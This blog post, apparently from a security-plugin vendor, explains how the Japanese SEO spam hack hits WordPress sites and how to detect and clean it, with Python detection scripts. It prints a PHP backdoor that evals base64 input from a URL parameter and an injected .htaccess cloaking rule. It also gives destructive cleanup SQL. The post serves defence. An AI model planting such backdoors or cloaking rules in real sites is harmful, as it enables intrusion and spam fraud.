Search for your own site on Google. If you see results like:
yoursite.com/バイアグラ-通販/viagra-order-online/
…your site has been hit by what the security community calls the Japanese SEO hack (also known as the Japanese keyword hack or pharmaceutical spam SEO attack). This is one of the most common forms of SEO spam injection.
How the attack works
Attackers inject thousands of spam URLs into your sitemap, pointing to Japanese-language pages for Viagra, Cialis, and other pharmaceuticals. These pages are:
- Invisible to you when you're logged in as an admin
- Visible to Google's crawler and to logged-out visitors from certain IPs
- Served from your domain to steal your SEO authority for illegal pharmacy spam
The injection is typically found in:
- sitemap.xml and sitemap_index.xml
- robots.txt
- The database (wp_options, wp_posts)
- Injected PHP files that generate dynamic sitemap entries
Why your rankings tank
Google eventually notices that thousands of your URLs serve Japanese pharmaceutical spam. It either manually penalises your site or its algorithms demote you. Recovering those rankings can take 6–12 months even after a complete clean-up.
How WO Security Shield detects it
WO Security Shield has a dedicated SEO spam detection engine that uses five independent strategies:
- Hostname extraction — checks whether your sitemap points to external domains
- Ratio analysis — if more than 10% of sitemap URLs are external, it flags them
- Latin keyword regex — 80+ pharma/gambling/adult spam terms
- Unicode block matching — detects raw Japanese (Hiragana, Katakana, CJK) characters in URLs
- Percent-encoded detection — catches the same scripts when URL-encoded (e.g. %E3%83%90%E3%82%A4%E3%82%A2%E3%82%B0%E3%83%A9)
This last one is critical — most scanners miss percent-encoded spam entirely.
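To make the five strategies concrete, here is an added Python example (not code from the original post or from WO Security Shield) that applies all five to a sitemap: hostname extraction, the 10% external-URL ratio, a Latin keyword regex, raw Unicode block matching for Hiragana, Katakana and CJK, and percent-decoding before the same Unicode check. It assumes a constructed four-entry sitemap embedded as SAMPLE_SITEMAP and a short stand-in term list in place of the plugin's 80+ keywords; all function and variable names are the example's own.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlsplit

# Constructed sample sitemap: one legitimate entry, one raw-Japanese entry,
# one percent-encoded entry (decodes to バイアグラ) and one external-host entry.
SAMPLE_SITEMAP = """<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>https://example.com/about-us/</loc></url>
  <url><loc>https://example.com/バイアグラ-通販/viagra-order-online/</loc></url>
  <url><loc>https://example.com/%E3%83%90%E3%82%A4%E3%82%A2%E3%82%B0%E3%83%A9/</loc></url>
  <url><loc>https://cheap-pills.invalid/shop/</loc></url>
</urlset>
"""

# Assumption: a short stand-in for the plugin's 80+ pharma/gambling/adult term list.
LATIN_SPAM_TERMS = re.compile(
    r"\b(viagra|cialis|levitra|casino|poker|xxx|porn|payday)\b", re.IGNORECASE
)

# Unicode blocks: Hiragana U+3040-309F, Katakana U+30A0-30FF, CJK Unified U+4E00-9FFF.
JAPANESE_CHARS = re.compile(r"[\u3040-\u30ff\u4e00-\u9fff]")

EXTERNAL_RATIO_THRESHOLD = 0.10  # the 10% rule described above


def extract_locs(sitemap_xml):
    """Return every <loc> text from a sitemap or sitemap index."""
    if isinstance(sitemap_xml, str):
        sitemap_xml = sitemap_xml.encode("utf-8")
    ns = {"sm": "http://www.sitemaps.org/schemas/sitemap/0.9"}
    root = ET.fromstring(sitemap_xml)
    return [el.text.strip() for el in root.iterfind(".//sm:loc", ns) if el.text]


def classify_url(url, site_host):
    """Return the strategies that flag this URL (empty list = clean)."""
    reasons = []
    parts = urlsplit(url)
    if parts.hostname and parts.hostname.lower() != site_host.lower():
        reasons.append("external-host")
    # Percent-decode so encoded Japanese gets the same Unicode check as raw Japanese.
    decoded = unquote(url)
    if JAPANESE_CHARS.search(url):
        reasons.append("japanese-raw")
    elif JAPANESE_CHARS.search(decoded):
        reasons.append("japanese-percent-encoded")
    # Treat slug separators as spaces so \b word boundaries behave on URL paths.
    if LATIN_SPAM_TERMS.search(decoded.replace("-", " ").replace("_", " ")):
        reasons.append("latin-spam-term")
    return reasons


def scan_sitemap(sitemap_xml, site_host):
    """Classify every URL and compute the external-host ratio for the whole sitemap."""
    urls = extract_locs(sitemap_xml)
    findings = {u: classify_url(u, site_host) for u in urls}
    external = sum(1 for r in findings.values() if "external-host" in r)
    ratio = external / len(urls) if urls else 0.0
    return {
        "total": len(urls),
        "external_ratio": ratio,
        "ratio_flag": ratio > EXTERNAL_RATIO_THRESHOLD,
        "flagged": {u: r for u, r in findings.items() if r},
    }


if __name__ == "__main__":
    report = scan_sitemap(SAMPLE_SITEMAP, "example.com")
    for url, reasons in report["flagged"].items():
        print(url, "->", ", ".join(reasons))
    print("external ratio: %.0f%% (flag=%s)" % (report["external_ratio"] * 100, report["ratio_flag"]))
```

To run it against a live site, fetch sitemap.xml (and every child sitemap listed in sitemap_index.xml) and pass the bytes to scan_sitemap with your own hostname; the percent-encoded branch is the one that matters most, because a raw-character check alone returns clean for a sitemap whose spam entries are all URL-encoded.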
Step-by-step removal
Step 1: Scan with WO Security Shield
Go to wosecurity.com, install the plugin, and run a full integrity scan. The SEO spam stage will show every infected URL and file.
Step 2: Remove injected sitemap entries
If the spam is in a PHP-generated sitemap (Yoast, Rank Math, etc.), the injection is usually in a plugin or theme file. Look for recently modified PHP files — attackers often hide malicious code inside legitimate plugins.
Step 3: Clean the database
-- Run a SELECT with the same WHERE clause first so you can review what will be removed
DELETE FROM wp_options WHERE option_value LIKE '%バイアグラ%';
DELETE FROM wp_posts WHERE post_content LIKE '%バイアグラ%';
Step 4: Submit a reconsideration request
After cleaning, go to Google Search Console → Security & Manual Actions and request a review. Be thorough in your explanation.
Step 5: Prevent reinfection
- Keep WordPress, all plugins, and themes updated
- Enable WO Security Shield's near-real-time file monitoring so you're alerted the moment any file changes
- Set up 2FA on all admin accounts
The Japanese SEO hack is one of the most damaging WordPress infections because it silently destroys your organic traffic. Catching it early with automated monitoring is the only reliable defence.
Deep Dive: How the Japanese SEO Hack Actually Works
Understanding the technical mechanism helps you clean it properly and prevent reinfection.
Stage 1: Initial Access
The attacker gains access through one of:
- An outdated plugin with a known file upload vulnerability
- Compromised admin credentials (often from credential stuffing)
- A vulnerability in a premium plugin that's not on WordPress.org (no automatic security review)
Stage 2: Backdoor Installation
Once inside, the attacker installs persistence mechanisms:
// Typical backdoor found in wp-includes/
if(isset($_GET['cmd'])) {
eval(base64_decode($_GET['cmd']));
}
They also often create a hidden admin user or modify an existing user's capabilities.
Stage 3: SEO Spam Injection
The actual spam injection usually happens through .htaccess modification:
# Injected by attacker — serves different content to search engines
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (Googlebot|bingbot|Yahoo) [NC]
RewriteCond %{REQUEST_URI} !^/wp-admin
RewriteRule ^(.*)$ /wp-content/plugins/cache/.cache.php?q=$1 [L]
This rule intercepts requests from search engine crawlers and serves them spam pages instead of your real content. Normal visitors (and you, the site owner) see your real site.
The spam generator file (.cache.php in this example) dynamically creates thousands of pages targeting Japanese pharmaceutical and luxury brand keywords.
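An added Python check (not from the original post and not part of WO Security Shield) for the cloaking behaviour described above: it requests the same URL twice, once with a crawler User-Agent and once with a browser one, then compares the two bodies by text similarity and by whether only the crawler copy contains Japanese characters. The fake_fetch function is a constructed stand-in for a compromised site so the block runs offline; http_fetch performs a real request when you point detect_cloaking at your own site. All names are the example's own.

```python
import difflib
import re
import urllib.request

CRAWLER_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
JAPANESE_CHARS = re.compile(r"[\u3040-\u30ff\u4e00-\u9fff]")


def http_fetch(url, user_agent, timeout=15):
    """Fetch a page body with a specific User-Agent (real network call)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def detect_cloaking(url, fetch=http_fetch, similarity_threshold=0.8):
    """Compare the crawler view and the browser view of one URL."""
    as_crawler = fetch(url, CRAWLER_UA)
    as_browser = fetch(url, BROWSER_UA)
    # 1.0 means identical bodies; a rewrite to a spam generator drives this down sharply.
    similarity = difflib.SequenceMatcher(None, as_browser, as_crawler).ratio()
    crawler_japanese = len(JAPANESE_CHARS.findall(as_crawler))
    browser_japanese = len(JAPANESE_CHARS.findall(as_browser))
    return {
        "similarity": similarity,
        "crawler_japanese_chars": crawler_japanese,
        "browser_japanese_chars": browser_japanese,
        # Either signal alone is enough: very different bodies, or Japanese served only to the crawler.
        "cloaked": similarity < similarity_threshold
        or (crawler_japanese > 0 and browser_japanese == 0),
    }


def fake_fetch(url, user_agent):
    """Constructed stand-in for a site with the .htaccess rule above: spam for crawlers only."""
    if "Googlebot" in user_agent:
        return "<html><title>バイアグラ 通販 激安</title><body>viagra order online ...</body></html>"
    return "<html><title>Example Bakery</title><body>Fresh bread daily.</body></html>"


if __name__ == "__main__":
    print(detect_cloaking("https://example.com/", fetch=fake_fetch))
```

This catches User-Agent based cloaking, which is what the RewriteCond above implements. Variants that key on the crawler's source IP (the "certain IPs" mentioned earlier) will look clean from your own machine; for those, use the live test in Google Search Console's URL Inspection tool, which fetches from Google's own addresses.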
Stage 4: Sitemap Injection
To accelerate indexing, the attacker:
- Creates a spam sitemap listing thousands of fake URLs
- Adds it to your robots.txt
- Sometimes submits it directly to Google Search Console (if they captured admin credentials)
Complete Removal Process
Step 1: Document the infection
Before cleaning anything:
# Save a copy of the infected .htaccess
cp .htaccess .htaccess.infected
# List all recently modified files
find . -name "*.php" -mtime -30 -type f > /tmp/recently_modified.txt
# Save the current sitemap state
curl -s https://yourdomain.com/sitemap.xml > /tmp/sitemap_infected.xml
Step 2: Remove the spam infrastructure
# Replace .htaccess (WordPress will regenerate it)
rm .htaccess
# Find and remove spam generator files (-exec handles spaces in names safely, unlike piping to xargs)
find wp-content -type f \( -name ".cache.php" -o -name ".stats.php" -o -name "class-*.tmp.php" \) -exec rm -f {} +
# List any extra sitemaps; review the output and delete only the files you did not create
find . -name "sitemap*.xml" -not -name "sitemap.xml" -type f
Step 3: Clean the database
-- Remove injected options (attackers use entries like these to regenerate spam on a schedule)
DELETE FROM wp_options WHERE option_name LIKE '_transient_wp_seo_spam%';
-- Check for a modified site URL (redirect attack)
SELECT option_value FROM wp_options WHERE option_name IN ('siteurl', 'home');
-- Find and remove rogue admin accounts
-- WARNING: this deletes every account except the ones listed, including editors and subscribers;
-- review the user table first and add every legitimate login to the IN (...) list
DELETE FROM wp_users WHERE user_login NOT IN ('your_real_admin');
-- Drop metadata left behind by the deleted users
DELETE FROM wp_usermeta WHERE user_id NOT IN (SELECT ID FROM wp_users);
Step 4: Replace all WordPress files
# Download fresh WordPress core
wp core download --force --skip-content
# Reinstall each plugin from WordPress.org
wp plugin install plugin-name --force
# Regenerate .htaccess (--hard rewrites the file itself, not only the rewrite rules stored in the database)
wp rewrite flush --hard
Step 5: Request spam removal from Google
- Go to Google Search Console → Removals
- Submit a prefix removal for the spam URL patterns (e.g., yourdomain.com/store/ if spam pages use that path)
- Under Security Issues, click Request a Review after cleanup is complete
- Re-submit your legitimate sitemap
Google typically processes these requests within 1–2 weeks.
Preventing Reinfection
The Japanese SEO hack has one of the highest reinfection rates — over 40% of cleaned sites get reinfected within 30 days. This is because:
- Attackers plant multiple backdoors — cleaning the obvious one leaves others
- The original vulnerability remains — if the outdated plugin isn't updated, the attacker walks back in
- Stolen credentials aren't rotated — changing WordPress passwords but not hosting/FTP credentials
Your post-cleanup checklist:
- Changed WordPress admin passwords for ALL users
- Changed hosting/cPanel password
- Changed FTP/SFTP credentials
- Changed database password (update wp-config.php)
- Updated ALL plugins and themes
- Deleted unused plugins and themes
- Installed file integrity monitoring (WO Security Shield)
- Enabled 2FA on all admin accounts
- Enabled WordPress firewall
- Set up daily backups stored off-server
- Scanned entire file tree for remaining backdoors
